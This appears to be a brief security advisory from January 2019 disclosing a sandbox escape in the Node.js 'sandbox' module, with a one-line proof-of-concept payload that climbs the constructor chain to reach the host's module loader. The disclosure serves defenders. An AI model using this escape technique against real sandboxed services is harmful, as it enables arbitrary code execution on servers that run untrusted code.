Severity: moderate

Sandbox Breakout / Arbitrary Code Execution



All versions of sandbox are vulnerable to Sandbox Escape leading to Remote Code Execution. Due to insufficient input sanitization it is possible to escape the sandbox using constructors.

Proof of concept

var Sandbox = require("sandbox")
s = new Sandbox()
code = `new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()("util").inspect("hi")`


No fix is currently available. Consider using an alternative module until a fix is made available.


Have content suggestions? Send them to [email protected]

Advisory timeline

  1. published

    Advisory Published
    Jan 14th, 2019
  2. reported

    Jan 14th, 2019